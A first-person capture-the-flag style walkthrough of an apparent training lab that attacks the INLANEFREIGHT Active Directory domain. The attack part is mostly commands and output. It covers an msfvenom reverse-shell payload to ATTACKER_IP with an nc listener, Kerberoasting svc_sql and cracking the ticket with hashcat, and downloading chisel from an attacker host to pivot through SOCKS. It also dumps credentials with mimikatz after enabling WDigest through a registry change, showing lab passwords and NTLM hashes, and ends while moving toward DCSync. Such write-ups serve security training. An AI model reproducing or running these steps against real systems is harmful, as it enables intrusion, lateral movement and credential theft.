admin:My_W3bsH3ll_P@ssw0rd!
webshell
webshell
Exploitation
Now my head started spinning on how to pop a reverse shell without metasploit, so I created a base 64 payload with msfvenom:
msfvenom-pwindows/x64/shell_reverse_tcpLHOST=<ATTACKER_IP>LPORT=<ATTACKER_Port>-fexe-oshell.exe
payload
Now our payload is ready, we need to upload it to the target:
shell
Start nc listener on my attack machine:
nc -lvnp 4466
In the terminal I then run C:\myshell.exe or whatever the name your payload is named, then I have a shell:
shell
To use native commands, I type powershell in the shell to get into powershell
To know the host identity and domain info I ran Get-ChildItem Env: | ft key,value
PSC:\>Get-ChildItemEnv:|ftkey,valueGet-ChildItemEnv:|ftkey,valueKeyValue--------ALLUSERSPROFILEC:\ProgramDataAPP_POOL_CONFIGC:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.configAPP_POOL_IDDefaultAppPoolAPPDATAC:\Windows\system32\config\systemprofile\AppData\RoamingCommonProgramFilesC:\ProgramFiles\CommonFilesCommonProgramFiles(x86)C:\ProgramFiles(x86)\CommonFilesCommonProgramW6432C:\ProgramFiles\CommonFilesCOMPUTERNAMEWEB-WIN01ComSpecC:\Windows\system32\cmd.exeDriverDataC:\Windows\System32\Drivers\DriverDataLOCALAPPDATAC:\Windows\system32\config\systemprofile\AppData\LocalNUMBER_OF_PROCESSORS4OSWindows_NTPathC:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPower...PATHEXT.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTUREAMD64PROCESSOR_IDENTIFIERAMD64Family25Model1Stepping1,AuthenticAMDPROCESSOR_LEVEL25PROCESSOR_REVISION0101ProgramDataC:\ProgramDataProgramFilesC:\ProgramFilesProgramFiles(x86)C:\ProgramFiles(x86)ProgramW6432C:\ProgramFilesPROMPT$P$GPSExecutionPolicyPreferenceBypassPSModulePathWindowsPowerShell\Modules;C:\ProgramFiles\WindowsPowerShell\Modules;C:\Windows\system32...PUBLICC:\Users\PublicSystemDriveC:SystemRootC:\WindowsTEMPC:\Windows\TEMPTMPC:\Windows\TEMPUSERDOMAININLANEFREIGHTUSERNAMEWEB-WIN01$USERPROFILEC:\Windows\system32\config\systemprofilewindirC:\Windows
COMPUTERNAME : WEB-WIN01USERDOMAIN : INLANEFREIGHT
👉 Now we Confirm:
PSC:\>routeprintrouteprint===========================================================================InterfaceList7...00505694db4c......vmxnet3EthernetAdapter#23...005056949eaf......vmxnet3EthernetAdapter1...........................SoftwareLoopbackInterface1===========================================================================IPv4RouteTable===========================================================================ActiveRoutes:NetworkDestinationNetmaskGatewayInterfaceMetric0.0.0.00.0.0.0172.16.6.1172.16.6.100110.0.0.00.0.0.010.129.0.110.129.25.221510.129.0.0255.255.0.0On-link10.129.25.2227110.129.25.22255.255.255.255On-link10.129.25.2227110.129.255.255255.255.255.255On-link10.129.25.22271127.0.0.0255.0.0.0On-link127.0.0.1331127.0.0.1255.255.255.255On-link127.0.0.1331127.255.255.255255.255.255.255On-link127.0.0.1331172.16.0.0255.255.0.0On-link172.16.6.100266172.16.6.100255.255.255.255On-link172.16.6.100266172.16.255.255255.255.255.255On-link172.16.6.100266224.0.0.0240.0.0.0On-link127.0.0.1331224.0.0.0240.0.0.0On-link172.16.6.100266224.0.0.0240.0.0.0On-link10.129.25.22271255.255.255.255255.255.255.255On-link127.0.0.1331255.255.255.255255.255.255.255On-link172.16.6.100266255.255.255.255255.255.255.255On-link10.129.25.22271===========================================================================PersistentRoutes:NetworkAddressNetmaskGatewayAddressMetric0.0.0.00.0.0.0172.16.6.11===========================================================================IPv6RouteTable===========================================================================ActiveRoutes:IfMetricNetworkDestinationGateway3271::/0fe80::250:56ff:fe94:a0a01331::1/128On-link3271dead:beef::/64On-link3271dead:beef::202/128On-link3271dead:beef::15a2:99e7:f7e2:6c05/128On-link7266fe80::/64On-link3271fe80::/64On-link3271fe80::15a2:99e7:f7e2:6c05/128On-link7266fe80::5425:f5d2:6282:3a53/128On-link1331ff00::/8On-link7266ff00::/8On-link3271ff00::/8On-link===========================================================================PersistentRoutes:None
With the above scan we confirm that this box is dual-homed (connected to two networks)
Two different networks exist:
- 172.16.6.0/16 → internal domain network (Guessing where DC is)
- 10.129.0.0/16 → external network
I tried to download fping but no luck, so I try to check the live hosts within the domain network with the code below.Though it was slow but I got back result:
6..7 | ForEach-Object { $i = $_; 1..254 | ForEach-Object { if (Test-Connection -ComputerName "172.16.$i.$_" -Count 1 -Quiet) { write-host "172.16.$i.$_ is UP" } } }
We got back three ips back including our host ip below:
PSC:\>6..7|ForEach-Object{$i=$_;1..254|ForEach-Object{if(Test-Connection-ComputerName"172.16.$i.$_"-Count1-Quiet){write-host"172.16.$i.$_ is UP"}}}172.16.6.3isUP172.16.6.50isUP172.16.6.100isUP
Then Check the password policy with net accounts /domain
PSC:\>netaccounts/domainnetaccounts/domainTherequestwillbeprocessedatadomaincontrollerfordomainINLANEFREIGHT.LOCAL.Forceuserlogoffhowlongaftertimeexpires?:NeverMinimumpasswordage(days):1Maximumpasswordage(days):42Minimumpasswordlength:1Lengthofpasswordhistorymaintained:24Lockoutthreshold:NeverLockoutduration(minutes):30Lockoutobservationwindow(minutes):30Computerrole:PRIMARY
To step-up our enumeration let's Download and move Powerview to the target and Import-Module:
PSC:\>Import-Module.\PowerView.ps1Import-Module.\PowerView.ps1PSC:\>Get-CommandGet-DomainUserGet-CommandGet-DomainUserCommandTypeNameVersionSource----------------------------FunctionGet-DomainUser
Then run Get-DomainUser * -spn | select samaccountname,serviceprincipalname to SPN accounts.
Why do we need check for SPN accounts?
These accounts are:
- service accounts
- tied to services (SQL, IIS, etc.)
- often have privileged access
- frequently have weak or reused passwords
- issued TGS (Ticket Granting Service) tickets
PSC:\>Get-DomainUser*-spn|selectsamaccountname,serviceprincipalnameGet-DomainUser*-spn|selectsamaccountname,serviceprincipalnamesamaccountnameserviceprincipalname----------------------------------azureconnectadfsconnect/azure01.inlanefreight.localbackupjobbackupjob/veam001.inlanefreight.localkrbtgtkadmin/changepwsqltestMSSQLSvc/DEVTEST.inlanefreight.local:1433sqlqaMSSQLSvc/QA001.inlanefreight.local:1433sqldevMSSQLSvc/SQL-DEV01.inlanefreight.local:1433svc_sqlMSSQLSvc/SQL01.inlanefreight.local:1433sqlprodMSSQLSvc/SQL02.inlanefreight.local:1433
We see that the samaccountname for the SPN in question (MSSQLSvc/SQL01.inlanefreight.local:1433) is svc_sql.
Now we can get the TGS ticket in Hashcat format.
PSC:\>Get-DomainUser*-spn|selectsamaccountname,serviceprincipalnameGet-DomainUser*-spn|selectsamaccountname,serviceprincipalnamesamaccountnameserviceprincipalname----------------------------------azureconnectadfsconnect/azure01.inlanefreight.localbackupjobbackupjob/veam001.inlanefreight.localkrbtgtkadmin/changepwsqltestMSSQLSvc/DEVTEST.inlanefreight.local:1433sqlqaMSSQLSvc/QA001.inlanefreight.local:1433sqldevMSSQLSvc/SQL-DEV01.inlanefreight.local:1433svc_sqlMSSQLSvc/SQL01.inlanefreight.local:1433sqlprodMSSQLSvc/SQL02.inlanefreight.local:1433PSC:\>Get-DomainUser-Identitysvc_sql|Get-DomainSPNTicket-FormatHashcatGet-DomainUser-Identitysvc_sql|Get-DomainSPNTicket-FormatHashcatSamAccountName:svc_sqlDistinguishedName:CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCALServicePrincipalName:MSSQLSvc/SQL01.inlanefreight.local:1433TicketByteHexStream:Hash:$krb5tgs23ドル$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*033ドルE72A1673FBECEC2BA32C7311A3407$DBAC70A37D122F20632D9777F49FF1CB87DC3A376E2D61BAE1BF93FAD4E41861A038816559BC11F7F086DDADC3AC8D13073F830621EE5431BD48991721A1B9C018A369EAAACACE5AE53DCC419F58C2DB509D1B28A4D52=44891900AF2D4743CAEA09F79161086BCE3F4399C5995F78163240BFBE6835609E71B74E52AD2A4BC30FBB838A25665AD2BE3B6C9DCBF8A9388C149308D212CB2742F95010E0ADBCC63B5E43A8444D9350BC21D0CCEA2A27DA58461A8F1CD2F00538774511EBBE6319ADAC6CBDFD476ACCA57983A5825BEBA52CD389E149403A500F9E294FEF1182EE08AF444ACCA0A1C14374908D6D84314A823E8CD7AC4449B6A8A2C93E2AA4892978A2692C0B37C697E42CD3F55BF8BD3A395C2F416CA16E93B4FF7DE4476C2BD7FFC191B4DC79A0B11586E9FD9B379733E5698317EA6EE0FE4DF2B9B26CBF3B30204F7B5F2487314235F93BCA85CB2B7C94B07F1CBEB54DD27FB8A73E44BBB039C28E3C79B61104EBB3BBCABBD00F1B222A08BEA24AFDF890CBCC5B142F630BFD2843030B67F623E389326C9B8E9EBF89AF7B42275D235BD245400F661704368970108B4100A86A7F545762B7E096302A03E3C16640A014189DB39602954E467B2DAA78423C166FC2375DCE11A0228AA111B9A5B510D33D84FD1E5EA39D18184CC0077596DDC7EF3FDF72DB0639796CA5019ECE30F92CB0FC130E5F4246F4ADA8D7914656AFAF229B5D885969D3E07C65F4561784416E9C012D3947DD6E78211EE247BC2DF3133AA3342E7CD0B09822984FBEA866D74D581CFAE2DE1B92830F4E5718A7CA2018FF0C70FBDA20D76393C52F0A15D26D32B2AEE1C3670B978DB0C57C256D3CDBB2BC0A38AC166A53E7E12030F6A39166472F91C20514E5D742267CB23CDCD9C4D709F41768C9082C09D9504DDA8074702DC042B4396F51224BABA0434383F9C8C98AF37C043B240608E8AFAA574CB08F70CE06CBF55115214BDFEF22692E4FBDC1BD7485F150C74152C0EA274EAF53BFB935C8DA5B2B4A1539331E7D4BFDB184257CFD4917DCCC651C349098AFF8DA1DA4C818F29797BB696C674683802FC914508FA879887D47EAE46C2D836F7472B9AC834BB2CAF1859E22705F2ED98CB127AB830F00473B0C0B2A108DC6400FC5E77D597FDBE1462030889DC498223B6A072588805D3CDB8600324EBC2EBCBCD35BFC020D4877316BF8EB9F11582CBA46C16436E14F813A4A5AE3EE0BB16BD07A73FF1B0BC135E95BF6A8FD9B5EFA9DAED725B5DD91F51E6330FDD76BB56116D34DB197D59061D19B21C485F962CD4DBE203C23A2A9203F34ED5C8FA32068061AE528DA2D144D362B501AE5F1CAB79FF516981970DC6FB31E80401A2B7B564E332B76FA564F8BD446C4984D1DD291397FAEC2EF7176399C01EB805FC57C228C42BF23AB6B9C5C8932FC09027A8DF5D8CB646CFBBF2D416D3FF73A04142240352B771E2BFEB150B3190572D570D46F9D1448BE760BC86D607CBE2519EB816A8E0D0E148C249
Let try to crack it with hashcat:
─[eu-academy-1]─[10.10.14.78]─[htb-ac-2510340@htb-hdniwpyvod]─[~]
└──╼ [★]$ hashcat -m 13100 svc_sql /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5tgs23ドル$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*033ドルe72a1673fbecec2ba32c7311a3407$dbac70a37d122f20632d9777f49ff1cb87dc3a376e2d61bae1bf93fad4e41861a038816559bc11f7f086ddadc3ac8d13073f830621ee5431bd48991721a1b9c018a369eaaacace5ae53dcc419f58c2db509d1b28a4d5244891900af2d4743caea09f79161086bce3f4399c5995f78163240bfbe6835609e71b74e52ad2a4bc30fbb838a25665ad2be3b6c9dcbf8a9388c149308d212cb2742f95010e0adbcc63b5e43a8444d9350bc21d0ccea2a27da58461a8f1cd2f00538774511ebbe6319adac6cbdfd476acca57983a5825beba52cd389e149403a500f9e294fef1182ee08af444acca0a1c14374908d6d84314a823e8cd7ac4449b6a8a2c93e2aa4892978a2692c0b37c697e42cd3f55bf8bd3a395c2f416ca16e93b4ff7de4476c2bd7ffc191b4dc79a0b11586e9fd9b379733e5698317ea6ee0fe4df2b9b26cbf3b30204f7b5f2487314235f93bca85cb2b7c94b07f1cbeb54dd27fb8a73e44bbb039c28e3c79b61104ebb3bbcabbd00f1b222a08bea24afdf890cbcc5b142f630bfd2843030b67f623e389326c9b8e9ebf89af7b42275d235bd245400f661704368970108b4100a86a7f545762b7e096302a03e3c16640a014189db39602954e467b2daa78423c166fc2375dce11a0228aa111b9a5b510d33d84fd1e5ea39d18184cc0077596ddc7ef3fdf72db0639796ca5019ece30f92cb0fc130e5f4246f4ada8d7914656afaf229b5d885969d3e07c65f4561784416e9c012d3947dd6e78211ee247bc2df3133aa3342e7cd0b09822984fbea866d74d581cfae2de1b92830f4e5718a7ca2018ff0c70fbda20d76393c52f0a15d26d32b2aee1c3670b978db0c57c256d3cdbb2bc0a38ac166a53e7e12030f6a39166472f91c20514e5d742267cb23cdcd9c4d709f41768c9082c09d9504dda8074702dc042b4396f51224baba0434383f9c8c98af37c043b240608e8afaa574cb08f70ce06cbf55115214bdfef22692e4fbdc1bd7485f150c74152c0ea274eaf53bfb935c8da5b2b4a1539331e7d4bfdb184257cfd4917dccc651c349098aff8da1da4c818f29797bb696c674683802fc914508fa879887d47eae46c2d836f7472b9ac834bb2caf1859e22705f2ed98cb127ab830f00473b0c0b2a108dc6400fc5e77d597fdbe1462030889dc498223b6a072588805d3cdb8600324ebc2ebcbcd35bfc020d4877316bf8eb9f11582cba46c16436e14f813a4a5ae3ee0bb16bd07a73ff1b0bc135e95bf6a8fd9b5efa9daed725b5dd91f51e6330fdd76bb56116d34db197d59061d19b21c485f962cd4dbe203c23a2a9203f34ed5c8fa32068061ae528da2d144d362b501ae5f1cab79ff516981970dc6fb31e80401a2b7b564e332b76fa564f8bd446c4984d1dd291397faec2ef7176399c01eb805fc57c228c42bf23ab6b9c5c8932fc09027a8df5d8cb646cfbbf2d416d3ff73a04142240352b771e2bfeb150b3190572d570d46f9d1448be760bc86d607cbe2519eb816a8e0d0e148c249:lucky7
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs23ドル$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/S...48c249
Time.Started.....: Wed Apr 29 10:27:05 2026 (0 secs)
Time.Estimated...: Wed Apr 29 10:27:05 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 691.4 kH/s (2.03ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: 123456 -> lovers1
Started: Wed Apr 29 10:26:56 2026
Stopped: Wed Apr 29 10:27:06 2026
The next question is Submit the contents of the flag.txt file on the Administrator desktop on MS01 so I ran the command below to confirm the MS01 ip address:
PSC:\>Resolve-DnsNameMS01Resolve-DnsNameMS01NameTypeTTLSectionIPAddress---------------------------MS01.INLANEFREIGHT.LOCALA1200Answer172.16.6.50
We are unable to connect directly to the MS01 from our attack box, that means we need to set up proxy server, so I chose chisel
I downloaded chisel, start python3 server on my attack machine and uploaded chisel to the target machine:
PSC:\>Invoke-WebRequesthttp://10.10.14.30:8080/chisel_windows.exe-OutFileC:\chisel_windows.exe
Then we need to start chisel as server on the target:
PSC:\>./chisel_windows.exeserver-p1234--socks5./chisel_windows.exeserver-p1234--socks52026/05/0107:23:52server:FingerprintWtNKsr+iugPQBM7bYUL4YCYLT4P157tKALSdqDCixpU=2026/05/0107:23:52server:Listeningonhttp://0.0.0.0:12342026/05/0107:24:42server:session#1: Client version (1.10.0) differs from server version (1.10.1)
Now we can start chisel on our attack machine as client:
─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-nyd2s4irji]─[~]
└──╼ [★]$ chisel client -v 10.129.28.167:1234 socks
2026年05月01日 09:24:42 client: Connecting to ws://10.129.28.167:1234
2026年05月01日 09:24:42 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2026年05月01日 09:24:42 client: tun: Bound proxies
2026年05月01日 09:24:42 client: Handshaking...
2026年05月01日 09:24:42 client: Sending config
2026年05月01日 09:24:42 client: Connected (Latency 1.637637ms)
2026年05月01日 09:24:42 client: tun: SSH connected
Because we are running on socks5 we need to modify the /etc/proxychains.conf to match what our attack machine is Listening.... when we start chisel as client 127.0.0.1:1080
proxy
Now that our proxy server is set and we confirm the MS01 IP let's use evil_winram into the machine to submite the flag with proxychains flag before our command:
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
We can also RDP into the host:
proxychains xfreerdp /v:<Server_IP> /u:<Username> /p:<Password> /size:1920x1080
While enumerting MS01 I noticed another user:
PSC:\>queryuser[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OKUSERNAMESESSIONNAMEIDSTATEIDLETIMELOGONTIMEtpettyconsole1Activenone5/1/20264:34AMsvc_sqlrdp-tcp#2 2 Active 1:16 5/1/2026 5:41 AM
Let's upload mimikatz to see if we can get plain text password for the same user on the host:
PS C:\>upload /home/htb-ac-2510340/mimikatz.exe
Info: Uploading /home/htb-ac-2510340/mimikatz.exe to C:\\mimikatz.exe
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
Info: Upload successful!
Let's run mimikatz with these flags "privilege::debug" "sekurlsa::logonpasswords":
PSC:\>.\mimikatz.exe"privilege::debug""sekurlsa::logonpasswords""exit"[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##'VincentLETOUX(vincent.letoux@gmail.com)'#####'>https://pingcastle.com/https://mysmartlogon.com***/mimikatz(commandline)# privilege::debugPrivilege'20'OKmimikatz(commandline)# sekurlsa::logonpasswordsAuthenticationId:0;1285573(00000000:00139dc5)Session:Interactivefrom2UserName:UMFD-2Domain:FontDriverHostLogonServer:(null)LogonTime:5/1/20265:41:36AMSID:S-1-5-96-0-2msv:[00000003]Primary*Username:MS01$*Domain:INLANEFREIGHT*NTLM:8fbaa4a365f38f8148230a72efe206d3*SHA1:bed51be11137d6ea159e1952b768de1f04171903tspkg:wdigest:*Username:MS01$*Domain:INLANEFREIGHT*Password:(null)kerberos:*Username:MS01$*Domain:INLANEFREIGHT.LOCAL*Password:f960d9d2546cd4dc9bb6db18486ac0a02237b7eefc49d930a58ce28cef6282f079784b53b78da3faa3bdd69ca66d4401cf96b15e45c6916808d4c9f337910913e90963bdade0212681d657abaf26011a7b6c0d4587973184ec8036b1231fb2a568c881e1d0acb561a94db0b6551fba89cf68bca82d4dfd038e93b3b21fd843f9c0425c29ce5d635381f60881d7af7498843e81a79c15a90edbafdff215271a816b672f6507cc4c3960511c544433c7f0ed1b860ba93f0754eba2e9a3f363dca78b155738ac6d7d744bf3921f61683349a81bfd963fa0d0a33b7f54b88b9ecc6f6085b4773ff4f53fa3eed27032d6c857ssp:credman:AuthenticationId:0;72704(00000000:00011c00)Session:Interactivefrom1UserName:DWM-1Domain:WindowManagerLogonServer:(null)LogonTime:5/1/20264:33:22AMSID:S-1-5-90-0-1msv:[00000003]Primary*Username:MS01$*Domain:INLANEFREIGHT*NTLM:8fbaa4a365f38f8148230a72efe206d3*SHA1:bed51be11137d6ea159e1952b768de1f04171903tspkg:wdigest:*Username:MS01$*Domain:INLANEFREIGHT*Password:(null)kerberos:*Username:MS01$*Domain:INLANEFREIGHT.LOCAL*Password:f960d9d2546cd4dc9bb6db18486ac0a02237b7eefc49d930a58ce28cef6282f079784b53b78da3faa3bdd69ca66d4401cf96b15e45c6916808d4c9f337910913e90963bdade0212681d657abaf26011a7b6c0d4587973184ec8036b1231fb2a568c881e1d0acb561a94db0b6551fba89cf68bca82d4dfd038e93b3b21fd843f9c0425c29ce5d635381f60881d7af7498843e81a79c15a90edbafdff215271a816b672f6507cc4c3960511c544433c7f0ed1b860ba93f0754eba2e9a3f363dca78b155738ac6d7d744bf3921f61683349a81bfd963fa0d0a33b7f54b88b9ecc6f6085b4773ff4f53fa3eed27032d6c857ssp:credman:AuthenticationId:0;1308030(00000000:0013f57e)Session:RemoteInteractivefrom2UserName:svc_sqlDomain:INLANEFREIGHTLogonServer:DC01LogonTime:5/1/20265:41:37AMSID:S-1-5-21-2270287766-1317258649-2146029398-4608msv:[00000003]Primary*Username:svc_sql*Domain:INLANEFREIGHT*NTLM:dc3ba1d16d82ac977eea8c22c5de3f82*SHA1:c052c598aaed303e20658a4a6341320867d8dcc4*DPAPI:32d87218d6331c60d8448418e504b7dftspkg:wdigest:*Username:svc_sql*Domain:INLANEFREIGHT*Password:(null)kerberos:*Username:svc_sql*Domain:INLANEFREIGHT.LOCAL*Password:(null)ssp:credman:mimikatz(commandline)# exitBye!
We got back some NTLM hash but the user we are after has NULL as password. Let's enable WDigest protocol to and try again to see if we would get lucky. Still on the host:172.16.6.50:
PSC:\Users\svc_sql.INLANEFREIGHT\Documents>regaddHKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest/vUseLogonCredential/tREG_DWORD/d1[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OKTheoperationcompletedsuccessfully.
Then restart:
PSC:\Users\svc_sql.INLANEFREIGHT\Documents>shutdown.exe/r/t0/f[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK
Now let's try mimikatz again:
PSC:\Users\svc_sql.INLANEFREIGHT\Documents>.\mimikatz.exe"privilege::debug""sekurlsa::logonpasswords""exit"[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK[proxychains]Strictchain...127.0.0.1:1080...172.16.6.50:5985...OK.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > http://blog.gentilkiwi.com/mimikatz'## v ##'VincentLETOUX(vincent.letoux@gmail.com)'#####'>http://pingcastle.com/http://mysmartlogon.com***/mimikatz(commandline)# privilege::debugPrivilege'20'OKmimikatz(commandline)# sekurlsa::logonpasswordsAuthenticationId:0;55262(00000000:0000d7de)Session:Interactivefrom1UserName:DWM-1Domain:WindowManagerLogonServer:(null)LogonTime:5/1/20269:40:36AMSID:S-1-5-90-0-1msv:[00000003]Primary*Username:MS01$*Domain:INLANEFREIGHT*NTLM:2951b92fba38c91eb04c39752106d237*SHA1:ae7ad0461a1f52dec0dfc42d44d939af1d3e7e75tspkg:wdigest:*Username:MS01$*Domain:INLANEFREIGHT*Password:38be36a55f82b1159c1ea71e3c2fcf0e7e8332e152584bd21100a99d22e100593d58231127fd1c9e5d996e63c5945fe4f4d50975e3b860f97bd88931d45c64086a296f7343ed3884f5ce0c6da1487036892d32f53281dd50dd1d133e5d4866dd1e05b24e139cd4b15e56d3d8c1575e2f5fe001ad3f4b15d3df5077c15bf46076ae4a15bfecb3cc75429b8f7ffb503efb73c7450018ddd77fa83b835a0f35bcbccf5da0acf7fd2ce87c0bbc51c34210a686c4750a107150fb581578f321445358b971ba4867fc03b236a2e5c5d9c498dadc9c5c44944518ed25afe8a99f0438457b6548e769170748b45124e21ae09984kerberos:*Username:MS01$*Domain:INLANEFREIGHT.LOCAL*Password:38be36a55f82b1159c1ea71e3c2fcf0e7e8332e152584bd21100a99d22e100593d58231127fd1c9e5d996e63c5945fe4f4d50975e3b860f97bd88931d45c64086a296f7343ed3884f5ce0c6da1487036892d32f53281dd50dd1d133e5d4866dd1e05b24e139cd4b15e56d3d8c1575e2f5fe001ad3f4b15d3df5077c15bf46076ae4a15bfecb3cc75429b8f7ffb503efb73c7450018ddd77fa83b835a0f35bcbccf5da0acf7fd2ce87c0bbc51c34210a686c4750a107150fb581578f321445358b971ba4867fc03b236a2e5c5d9c498dadc9c5c44944518ed25afe8a99f0438457b6548e769170748b45124e21ae09984ssp:credman:AuthenticationId:0;170825(00000000:00029b49)Session:Interactivefrom1UserName:tpettyDomain:INLANEFREIGHTLogonServer:DC01LogonTime:5/1/20269:40:40AMSID:S-1-5-21-2270287766-1317258649-2146029398-4607msv:[00000003]Primary*Username:tpetty*Domain:INLANEFREIGHT*NTLM:fd37b6fec5704cadabb319cebf9e3a3a*SHA1:38afea42a5e28220474839558f073979645a1192*DPAPI:da2ec07551ab1602b7468db08b41e3b2tspkg:wdigest:*Username:tpetty*Domain:INLANEFREIGHT*Password:Sup3rS3cur3D0m@inU2eRkerberos:*Username:tpetty*Domain:INLANEFREIGHT.LOCAL*Password:(null)ssp:credman:mimikatz(commandline)# exitBye!
Now we got back plain text password:Sup3rS3cur3D0m@inU2eR for:tpetty
Let's check what the user can do:
PSC:\Users\tpetty>Import-Module.\PowerView.ps1PSC:\Users\tpetty>$sid=Convert-NameToSidtpettyPSC:\Users\tpetty>Get-DomainObjectACL-Identity*|?{$_.SecurityIdentifier-eq$sid}ObjectDN:DC=INLANEFREIGHT,DC=LOCALObjectSID:S-1-5-21-2270287766-1317258649-2146029398ActiveDirectoryRights:ExtendedRightObjectAceFlags:ObjectAceTypePresentObjectAceType:89e95b76-444d-4c62-991a-0facbeda640cInheritedObjectAceType:00000000-0000-0000-0000-000000000000BinaryLength:56AceQualifier:AccessAllowedIsCallback:FalseOpaqueLength:0AccessMask:256SecurityIdentifier:S-1-5-21-2270287766-1317258649-2146029398-4607AceType:AccessAllowedObjectAceFlags:NoneIsInherited:FalseInheritanceFlags:NonePropagationFlags:NoneAuditFlags:NoneObjectDN:DC=INLANEFREIGHT,DC=LOCALObjectSID:S-1-5-21-2270287766-1317258649-2146029398ActiveDirectoryRights:ExtendedRightObjectAceFlags:ObjectAceTypePresentObjectAceType:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2InheritedObjectAceType:00000000-0000-0000-0000-000000000000BinaryLength:56AceQualifier:AccessAllowedIsCallback:FalseOpaqueLength:0AccessMask:256SecurityIdentifier:S-1-5-21-2270287766-1317258649-2146029398-4607AceType:AccessAllowedObjectAceFlags:NoneIsInherited:FalseInheritanceFlags:NonePropagationFlags:NoneAuditFlags:NoneObjectDN:DC=INLANEFREIGHT,DC=LOCALObjectSID:S-1-5-21-2270287766-1317258649-2146029398ActiveDirectoryRights:ExtendedRightObjectAceFlags:ObjectAceTypePresentObjectAceType:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2InheritedObjectAceType:00000000-0000-0000-0000-000000000000BinaryLength:56AceQualifier:AccessAllowedIsCallback:FalseOpaqueLength:0AccessMask:256SecurityIdentifier:S-1-5-21-2270287766-1317258649-2146029398-4607AceType:AccessAllowedObjectAceFlags:NoneIsInherited:FalseInheritanceFlags:NonePropagationFlags:NoneAuditFlags:None
We notice the GUIDs below after checking them online which can lead to DCSync attack:
1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
89e95b76-444d-4c62-991a-0facbeda640c
Replicating Directory Changes + Replicating Directory Changes All (with ExtendedRight on the domain object)
I connect to the host via RDP:
┌─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains xfreerdp /v:172.16.6.50 /u:svc_sql /p:lucky7 /size:600x550[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:3389 ... OK
Then I ran runas /user:INLANEFREIGHT\tpetty powershell.exe to run as tpetty, this open another powershell running as tpetty
shell
To futher enumerate I need mimikatz on the host, so I decided to connect the host via evil-winrm to make it easy to upload scripts. I uploaded mimikatz via evil-winrm in the tpetty DIR for easy access
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
*Evil-WinRM* PS C:\Users\svc_sql.INLANEFREIGHT\Documents> cd C:\
*Evil-WinRM* PS C:\> cd Users
*Evil-WinRM* PS C:\Users> cd tpetty
Then I run mimikatz on the powershell running as tpetty
